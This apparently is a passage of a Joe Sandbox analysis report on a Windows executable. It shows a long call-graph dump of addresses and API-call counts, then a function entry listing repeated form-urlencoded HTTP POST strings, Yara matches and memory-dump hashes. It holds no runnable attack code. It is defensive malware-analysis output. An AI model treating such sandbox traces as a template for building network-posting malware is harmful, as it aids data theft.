53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26037->26710 26039 324ef0 27 API calls 26038->26039 26040 317ba1 26039->26040 26043 311810 27 API calls 26040->26043 26042 317b44 26042->26038 26045 317bc0 26043->26045 26044->26032 26049 311810 27 API calls 26044->26049 26046 311810 27 API calls 26045->26046 26047 317dcf 26046->26047 26048 33f8b0 28 API calls 26047->26048 26056 317de2 __aulldiv 26048->26056 26050 316549 26049->26050 26051 325560 27 API calls 26050->26051 26052 31656a 26051->26052 26698 314de0 39 API calls 4 library calls 26052->26698 26054 31845d 26055 311810 27 API calls 26054->26055 26057 31846d 26055->26057 26056->26054 26711 315340 39 API calls 4 library calls 26056->26711 26059 349554 _Allocate 16 API calls 26057->26059 26058 316579 __aulldiv 26061 325560 27 API calls 26058->26061 26060 31847b 26059->26060 26063 318491 ___scrt_fastfail 26060->26063 26064 3184ba 26060->26064 26065 3166eb 26061->26065 26712 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26063->26712 26067 324ef0 27 API calls 26064->26067 26699 325e80 11 API calls allocator 26065->26699 26069 31850f 26067->26069 26071 311810 27 API calls 26069->26071 26070 3184b2 26070->26064 26072 31852e 26071->26072 26073 311810 27 API calls 26072->26073 26074 31873d 26073->26074 26075 33f8b0 28 API calls 26074->26075 26081 318750 26075->26081 26076 3166fa __aulldiv 26078 311810 27 API calls 26076->26078 26080 317ae0 26076->26080 26077 318ae0 26079 311810 27 API calls 26077->26079 26082 316ac6 26078->26082 26083 318af0 26079->26083 26085 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26080->26085 26081->26077 26094 3188d3 26081->26094 26086 325560 27 API calls 26082->26086 26087 349554 _Allocate 16 API calls 26083->26087 26084 31844e 26088 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26084->26088 26085->26032 26089 316ae7 26086->26089 26090 318afe 26087->26090 26088->26054 26700 314de0 39 API calls 4 library calls 26089->26700 26092 318b14 ___scrt_fastfail 26090->26092 26122 318b3d __aulldiv 26090->26122 26714 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26092->26714 26093 31824b __aulldiv 26093->26084 26103 3183f8 26093->26103 26713 315340 39 API calls 4 library calls 26094->26713 26097 316af6 __aulldiv 26101 316c92 26097->26101 26701 326290 27 API calls Concurrency::cancellation_token_source::~cancellation_token_source 26097->26701 26098 318a99 26100 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26098->26100 26099 318b35 26099->26122 26102 318ab7 26100->26102 26702 325e80 11 API calls allocator 26101->26702 26105 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26102->26105 26109 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26103->26109 26107 318ac6 26105->26107 26110 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26107->26110 26108 316ca1 26111 311810 27 API calls 26108->26111 26113 318425 26109->26113 26241 317aba 26110->26241 26112 316df8 26111->26112 26114 325560 27 API calls 26112->26114 26115 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26113->26115 26117 316e19 26114->26117 26118 318434 26115->26118 26116 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26119 31a9ed 26116->26119 26703 314de0 39 API calls 4 library calls 26117->26703 26121 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26118->26121 26119->25798 26121->26241 26123 324ef0 27 API calls 26122->26123 26124 318c7f 26123->26124 26125 311810 27 API calls 26124->26125 26127 318c9e 26125->26127 26126 317ad1 26709 325e80 11 API calls allocator 26126->26709 26128 311810 27 API calls 26127->26128 26130 318f80 26128->26130 26131 33f8b0 28 API calls 26130->26131 26134 318f9d __aulldiv 26131->26134 26132 319999 26133 311810 27 API calls 26132->26133 26135 3199a9 26133->26135 26134->26132 26138 3190d9 26134->26138 26152 319308 __aulldiv 26134->26152 26136 349554 _Allocate 16 API calls 26135->26136 26137 3199b7 26136->26137 26139 3199cd ___scrt_fastfail 26137->26139 26163 3199f6 __aulldiv 26137->26163 26715 34cf43 26138->26715 26719 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26139->26719 26141 316e28 __aulldiv 26141->26126 26704 327220 27 API calls 2 library calls 26141->26704 26144 3176a3 26705 327400 27 API calls 26144->26705 26146 34cf43 34 API calls 26161 319125 ___scrt_fastfail 26146->26161 26148 3199ee 26148->26163 26149 3176e2 26150 327340 27 API calls 26149->26150 26151 317721 26150->26151 26706 327400 27 API calls 26151->26706 26152->26132 26718 315340 39 API calls 4 library calls 26152->26718 26154 317760 26155 327340 27 API calls 26154->26155 26156 31779f 26155->26156 26707 327400 27 API calls 26156->26707 26159 3177de 26160 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26159->26160 26162 3177f0 26160->26162 26168 34cf43 34 API calls 26161->26168 26164 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26162->26164 26167 324ef0 27 API calls 26163->26167 26165 3177ff 26164->26165 26166 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26165->26166 26169 31780e 26166->26169 26170 319b38 26167->26170 26171 3192c1 26168->26171 26172 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26169->26172 26173 311810 27 API calls 26170->26173 26171->25798 26174 31781d 26172->26174 26175 319b57 26173->26175 26176 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26174->26176 26177 311810 27 API calls 26175->26177 26185 31782c __aulldiv 26176->26185 26178 319e1b 26177->26178 26181 33f8b0 28 API calls 26178->26181 26179 31998a 26180 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26179->26180 26180->26132 26190 319e38 __aulldiv 26181->26190 26182 317ac2 26183 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26182->26183 26183->26126 26184 319760 __aulldiv 26184->26179 26187 319916 26184->26187 26185->26182 26189 317a5d 26185->26189 26186 31a83b 26188 311810 27 API calls 26186->26188 26193 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26187->26193 26191 31a976 26188->26191 26196 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26189->26196 26190->26186 26195 319f74 26190->26195 26221 31a1a6 __aulldiv 26190->26221 26192 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26191->26192 26194 31a994 26192->26194 26197 319943 26193->26197 26198 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26194->26198 26199 34cf43 34 API calls 26195->26199 26200 317a8a 26196->26200 26201 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26197->26201 26202 31a9a3 26198->26202 26203 319f79 26199->26203 26708 325e80 11 API calls allocator 26200->26708 26205 319952 26201->26205 26206 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26202->26206 26215 34cf43 34 API calls 26203->26215 26208 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26205->26208 26209 31a9b2 26206->26209 26207 317a99 26210 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26207->26210 26211 319961 26208->26211 26213 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26209->26213 26214 317aa8 26210->26214 26212 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26211->26212 26216 319970 26212->26216 26217 31a9c1 26213->26217 26218 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26214->26218 26223 319fc0 ___scrt_fastfail 26215->26223 26219 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26216->26219 26220 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26217->26220 26218->26241 26219->26241 26220->26241 26221->26186 26720 315340 39 API calls 4 library calls 26221->26720 26224 34cf43 34 API calls 26223->26224 26225 31a15f 26224->26225 26225->25798 26226 31a82c 26227 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26226->26227 26227->26186 26228 31a5ef __aulldiv 26228->26226 26229 31a7a9 26228->26229 26230 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26229->26230 26231 31a7d6 26230->26231 26232 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26231->26232 26233 31a7e5 26232->26233 26234 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26233->26234 26235 31a7f4 26234->26235 26236 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26235->26236 26237 31a803 26236->26237 26238 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26237->26238 26239 31a812 26238->26239 26240 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26239->26240 26240->26241 26241->26116 26243 3270b7 26242->26243 26244 3296b0 27 API calls 26243->26244 26245 32710c 26244->26245 26246 326200 27 API calls 26245->26246 26247 327152 26246->26247 26248 325470 27 API calls 26247->26248 26249 32715e 26248->26249 26250 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26249->26250 26251 327182 26250->26251 26252 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26251->26252 26253 321f07 26252->26253 26254 325560 26253->26254 26721 326330 26254->26721 26257 31b1f0 26259 31b26e __aulldiv 26257->26259 26258 31c3f3 26260 311810 27 API calls 26258->26260 26259->26258 26263 31b44c 26259->26263 26268 31b736 26259->26268 26261 31c405 26260->26261 26262 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26261->26262 26264 31c420 26262->26264 26265 34cf43 34 API calls 26263->26265 26266 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26264->26266 26270 31b451 ___scrt_fastfail 26265->26270 26267 31c322 26266->26267 26271 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26267->26271 26731 311390 26268->26731 26274 34cf43 34 API calls 26270->26274 26275 31c449 26271->26275 26277 31b4d2 26274->26277 26275->25806 26276 31b7f3 26278 327080 27 API calls 26276->26278 26281 34cf43 34 API calls 26277->26281 26279 31b931 26278->26279 26280 34cf43 34 API calls 26279->26280 26282 31b93d 26280->26282 26287 31b519 ___scrt_fastfail 26281->26287 26283 349554 _Allocate 16 API calls 26282->26283 26284 31b9b6 26283->26284 26285 31b9f5 26284->26285 26286 31b9cc ___scrt_fastfail 26284->26286 26288 327080 27 API calls 26285->26288 26750 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26286->26750 26291 34cf43 34 API calls 26287->26291 26293 31bd3c __aulldiv 26288->26293 26290 31b9ed 26290->26285 26292 31b6b5 ___scrt_fastfail 26291->26292 26292->25806 26294 324ef0 27 API calls 26293->26294 26295 31befc 26294->26295 26296 325560 27 API calls 26295->26296 26297 31bf1d 26296->26297 26298 327340 27 API calls 26297->26298 26299 31bf4a 26298->26299 26300 33f8b0 28 API calls 26299->26300 26301 31bf6a 26300->26301 26302 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26301->26302 26303 31bf79 26302->26303 26304 34cf43 34 API calls 26303->26304 26305 31bf7e ___scrt_fastfail 26304->26305 26306 31c339 26305->26306 26307 325560 27 API calls 26305->26307 26308 34cf43 34 API calls 26306->26308 26309 31c01f 26307->26309 26312 31c33e ___scrt_fastfail 26308->26312 26310 31c059 26309->26310 26311 31c28b 26309->26311 26315 34cf43 34 API calls 26310->26315 26313 31c2a1 26311->26313 26314 31c32a 26311->26314 26316 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26312->26316 26321 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26313->26321 26317 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26314->26317 26318 31c05e 26315->26318 26319 31c3c6 26316->26319 26317->26306 26322 34cf43 34 API calls 26318->26322 26320 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26319->26320 26323 31c3d5 26320->26323 26324 31c2ce 26321->26324 26339 31c0a5 ___scrt_fastfail 26322->26339 26325 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26323->26325 26326 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26324->26326 26327 31c3e4 26325->26327 26328 31c2da 26326->26328 26329 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26327->26329 26330 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26328->26330 26329->26258 26331 31c2e9 26330->26331 26332 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26331->26332 26333 31c2f8 26332->26333 26334 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26333->26334 26335 31c307 26334->26335 26336 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26335->26336 26337 31c313 26336->26337 26338 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26337->26338 26338->26267 26340 34cf43 34 API calls 26339->26340 26341 31c244 26340->26341 26341->25806 26342->25809 26343->25811 26344->25813 26345->25815 26346->25823 26349 311a32 Concurrency::cancellation_token_source::~cancellation_token_source 26347->26349 26348 311a83 26348->25816 26349->26348 26350 312010 allocator 11 API calls 26349->26350 26350->26348 26352 31189d 26351->26352 26352->26352 26353 311c20 27 API calls 26352->26353 26354 3118d4 26353->26354 26354->25827 26356 311c70 26355->26356 26357 311c34 __InternalCxxFrameHandler 26355->26357 26755 311ea0 27 API calls 4 library calls 26356->26755 26357->25869 26359->25876 26360->25879 26362 32735c 26361->26362 26362->26362 26363 326200 27 API calls 26362->26363 26364 327393 26363->26364 26364->25885 26365->25890 26366->25946 26367->25951 26368->25953 26369->25832 26370->25840 26371->25847 26372->25861 26373->25932 26374->25935 26375->25942 26376->25964 26377->25968 26378->25843 26379->25851 26380->25895 26381->25908 26382->25891 26384 349351 26383->26384 26385 349353 IsProcessorFeaturePresent 26383->26385 26384->25793 26387 349395 26385->26387 26756 349359 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26387->26756 26389 349478 26389->25793 26391 353ab2 26390->26391 26392 353ab8 26390->26392 26419 354c1e 6 API calls __dosmaperr 26391->26419 26396 353abe SetLastError 26392->26396 26420 354c5d 6 API calls __dosmaperr 26392->26420 26395 353ad6 26395->26396 26397 353ada 26395->26397 26403 353b52 26396->26403 26404 3219ec LoadLibraryA LoadLibraryA 26396->26404 26421 356f2e 14 API calls 2 library calls 26397->26421 26400 353ae6 26401 353b05 26400->26401 26402 353aee 26400->26402 26423 354c5d 6 API calls __dosmaperr 26401->26423 26422 354c5d 6 API calls __dosmaperr 26402->26422 26426 35352b 34 API calls _unexpected 26403->26426 26404->25791 26404->25795 26408 353afc 26413 3543f6 _free 14 API calls 26408->26413 26410 353b11 26411 353b15 26410->26411 26412 353b26 26410->26412 26424 354c5d 6 API calls __dosmaperr 26411->26424 26425 3538c9 14 API calls __dosmaperr 26412->26425 26416 353b02 26413->26416 26416->26396 26417 353b31 26418 3543f6 _free 14 API calls 26417->26418 26418->26416 26419->26392 26420->26395 26421->26400 26422->26408 26423->26410 26424->26408 26425->26417 26428 31aa3d 26427->26428 26449 349554 26428->26449 26431 31aa5b ___scrt_fastfail 26487 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26431->26487 26433 31aa76 26434 31aa7b __aulldiv 26433->26434 26459 324ef0 26434->26459 26437 311810 27 API calls 26438 31ac11 26437->26438 26439 311810 27 API calls 26438->26439 26440 31ac74 26439->26440 26463 33f8b0 26440->26463 26443 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26444 31ac9d 26443->26444 26445 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26444->26445 26446 31acac 26445->26446 26447 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26446->26447 26448 31acc7 26447->26448 26448->26001 26448->26002 26452 349559 26449->26452 26451 31aa4b 26451->26431 26451->26434 26452->26451 26454 349575 _Allocate 26452->26454 26488 351f67 26452->26488 26495 352295 EnterCriticalSection LeaveCriticalSection _Allocate 26452->26495 26455 349a7b Concurrency::cancel_current_task 26454->26455 26496 34a9cb RaiseException 26454->26496 26497 34a9cb RaiseException 26455->26497 26457 349a98 26460 324f81 26459->26460 26460->26460 26500 325ff0 26460->26500 26462 31abf2 26462->26437 26467 33f8f1 26463->26467 26464 33fa3f 26465 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26464->26465 26466 33fa51 26465->26466 26468 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26466->26468 26467->26464 26469 325560 27 API calls 26467->26469 26470 33fa5d 26468->26470 26471 33f934 26469->26471 26472 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26470->26472 26474 325560 27 API calls 26471->26474 26473 33fa69 26472->26473 26585 325f50 26473->26585 26476 33f94c 26474->26476 26505 33faa0 26476->26505 26479 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26480 31ac88 26479->26480 26480->26443 26487->26433 26493 3548df __dosmaperr 26488->26493 26489 35491d 26499 350cb8 14 API calls __dosmaperr 26489->26499 26491 354908 RtlAllocateHeap 26492 35491b 26491->26492 26491->26493 26492->26452 26493->26489 26493->26491 26498 352295 EnterCriticalSection LeaveCriticalSection _Allocate 26493->26498 26495->26452 26496->26455 26497->26457 26498->26493 26499->26492 26501 326047 26500->26501 26502 326004 __InternalCxxFrameHandler 26500->26502 26504 327f50 27 API calls 5 library calls 26501->26504 26502->26462 26504->26502 26506 33fafe 26505->26506 26507 33fb2c 26506->26507 26514 33fb59 26506->26514 26508 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26507->26508 26509 33fb3f 26508->26509 26510 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26509->26510 26511 33fb4e 26510->26511 26512 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26511->26512 26513 33f958 26512->26513 26513->26464 26539 340b80 26513->26539 26516 33fcf8 26514->26516 26589 340c20 21 API calls __InternalCxxFrameHandler 26514->26589 26590 326a60 27 API calls 26516->26590 26518 33fe53 26519 33febd 26518->26519 26591 326a60 27 API calls 26518->26591 26521 3400b4 26519->26521 26523 33ff10 26519->26523 26524 3400b2 26521->26524 26600 326290 27 API calls Concurrency::cancellation_token_source::~cancellation_token_source 26521->26600 26592 326200 26523->26592 26601 341010 27 API calls 2 library calls 26524->26601 26527 3400a6 26596 325470 26527->26596 26529 34014f 26602 341010 27 API calls 2 library calls 26529->26602 26531 3401a5 26532 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26531->26532 26533 3401b8 26532->26533 26534 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26533->26534 26535 3401c4 26534->26535 26536 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26535->26536 26537 3401d0 26536->26537 26538 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26537->26538 26538->26511 26604 340d10 26539->26604 26542 33f630 26543 33f667 26542->26543 26544 33f689 26543->26544 26545 33f66e 26543->26545 26548 33f6a4 26544->26548 26549 33f6bf 26544->26549 26546 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26545->26546 26547 33f681 26546->26547 26547->26464 26565 33f780 26547->26565 26550 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26548->26550 26551 33f6d6 26549->26551 26552 33f6ee 26549->26552 26550->26547 26553 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26551->26553 26554 340b80 27 API calls 26552->26554 26553->26547 26555 33f6ff 26554->26555 26617 3403a0 26555->26617 26558 33f712 26560 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26558->26560 26559 33f72a 26561 33f751 26559->26561 26562 33f739 26559->26562 26560->26547 26564 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26561->26564 26563 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26562->26563 26563->26547 26564->26547 26634 3407c0 26565->26634 26567 33f7b3 26638 3405e0 26567->26638 26570 33f7fa 26572 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26570->26572 26573 33f802 26572->26573 26654 340f20 26573->26654 26578 33f861 26581 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26578->26581 26579 33f847 26580 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26579->26580 26582 33f85a 26580->26582 26581->26582 26583 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26582->26583 26584 33f89d 26583->26584 26584->26464 26586 325f62 Concurrency::cancellation_token_source::~cancellation_token_source 26585->26586 26588 325fb5 26586->26588 26692 312010 26586->26692 26588->26479 26589->26516 26590->26518 26591->26519 26593 326220 __InternalCxxFrameHandler 26592->26593 26594 326266 26592->26594 26593->26527 26603 328170 27 API calls 4 library calls 26594->26603 26597 32548a 26596->26597 26598 326200 27 API calls 26597->26598 26599 32549d 26598->26599 26599->26524 26600->26524 26601->26529 26602->26531 26603->26593 26605 340d3a 26604->26605 26606 340d49 __wsopen_s 26605->26606 26614 329600 5 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26605->26614 26609 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26606->26609 26608 340d8d 26611 340de5 26608->26611 26615 311260 RaiseException Concurrency::cancel_current_task 26608->26615 26610 33fa10 26609->26610 26610->26542 26616 311fd0 27 API calls _Allocate 26611->26616 26614->26608 26615->26611 26616->26606 26618 3403f6 26617->26618 26619 3403db 26617->26619 26621 340403 26618->26621 26626 34052b 26618->26626 26620 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26619->26620 26633 3403ee 26620->26633 26622 311810 27 API calls 26621->26622 26623 340410 26622->26623 26625 325470 27 API calls 26623->26625 26624 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26627 33f707 26624->26627 26628 340423 26625->26628 26629 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26626->26629 26627->26558 26627->26559 26630 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26628->26630 26629->26633 26631 340515 26630->26631 26632 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26631->26632 26632->26633 26633->26624 26635 3407dc 26634->26635 26636 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26635->26636 26637 34081f 26636->26637 26637->26567 26639 340639 GetLastError 26638->26639 26640 34061b 26638->26640 26644 34066e 26639->26644 26645 34078a 26639->26645 26641 324ef0 27 API calls 26640->26641 26642 340628 26641->26642 26647 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26642->26647 26648 324ef0 27 API calls 26644->26648 26646 324ef0 27 API calls 26645->26646 26646->26642 26649 33f7d3 26647->26649 26650 34067b 26648->26650 26649->26570 26669 340e60 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 26649->26669 26651 325ff0 27 API calls 26650->26651 26652 340731 26650->26652 26651->26652 26653 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26652->26653 26653->26642 26670 3411a0 26654->26670 26657 326200 27 API calls 26658 340fd6 26657->26658 26659 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26658->26659 26660 340fe8 26659->26660 26661 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26660->26661 26662 33f834 26661->26662 26663 340830 26662->26663 26666 340853 ___scrt_fastfail 26663->26666 26668 34084c 26663->26668 26664 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26665 33f840 26664->26665 26665->26578 26665->26579 26667 326200 27 API calls 26666->26667 26666->26668 26667->26666 26668->26664 26669->26570 26673 341510 26670->26673 26682 3296b0 26673->26682 26675 341589 26677 3415a5 26675->26677 26679 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26675->26679 26680 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26677->26680 26678 341552 26678->26675 26689 311bb0 27 API calls 26678->26689 26679->26677 26681 340f8f 26680->26681 26681->26657 26683 3296c6 26682->26683 26684 3296c4 26682->26684 26683->26684 26685 3296de 26683->26685 26687 32970b 26683->26687 26684->26678 26690 330900 27 API calls 4 library calls 26685->26690 26687->26684 26691 326100 11 API calls 3 library calls 26687->26691 26689->26678 26690->26684 26691->26684 26693 312048 error_info_injector 26692->26693 26694 31203b 26692->26694 26693->26588 26696 311320 11 API calls _Allocate 26694->26696 26696->26693 26697->26023 26698->26058 26699->26076 26700->26097 26701->26101 26702->26108 26703->26141 26704->26144 26705->26149 26706->26154 26707->26159 26708->26207 26709->26080 26710->26042 26711->26093 26712->26070 26713->26098 26714->26099 26716 353a9b _unexpected 34 API calls 26715->26716 26717 3190de 26716->26717 26717->26146 26718->26184 26719->26148 26720->26228 26722 32635a 26721->26722 26723 326369 __wsopen_s 26722->26723 26729 311b00 5 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26722->26729 26726 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26723->26726 26725 3263b1 26730 311fd0 27 API calls _Allocate 26725->26730 26727 321f1e 26726->26727 26727->26257 26729->26725 26730->26723 26733 3113c7 26731->26733 26732 311555 26734 3116e5 26732->26734 26735 311593 26732->26735 26752 34947a 5 API calls ___report_securityfailure 26732->26752 26733->26732 26751 311bb0 27 API calls 26733->26751 26736 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26734->26736 26740 3116be 26735->26740 26753 311bb0 27 API calls 26735->26753 26737 311709 26736->26737 26739 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26737->26739 26742 311721 26739->26742 26740->26734 26754 311bb0 27 API calls 26740->26754 26745 3133d0 26742->26745 26746 3133ef 26745->26746 26747 325560 27 API calls 26746->26747 26749 313404 26746->26749 26748 31354c 26747->26748 26748->26276 26749->26276 26750->26290 26751->26733 26752->26732 26753->26735 26754->26740 26755->26357 26756->26389

                                                Executed Functions

                                                Function 00315BA0 Relevance: 49.5, APIs: 21, Strings: 5, Instructions: 3998COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00315D87
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00319B2E
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00318C75
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00317B97
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00318505
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded
                                                • API String ID: 3732870572-2585428591
                                                • Opcode ID: efeb8c0ba0624f6a2b82bbb341261d03d85d13a6c9b0e7b658581fcc4e6b02bc
                                                • Instruction ID: 9a2bb8661eb30a6df8b4f694d28679a6800e8915d075d4bf5845758f29486990
                                                • Opcode Fuzzy Hash: efeb8c0ba0624f6a2b82bbb341261d03d85d13a6c9b0e7b658581fcc4e6b02bc
                                                • Instruction Fuzzy Hash: 71A314B0D056A88BEB66CB28CC41BDABBB5AF99304F1481D9E54CA7251DB706FC5CF40
                                                Function 00374044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171fileprocessCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
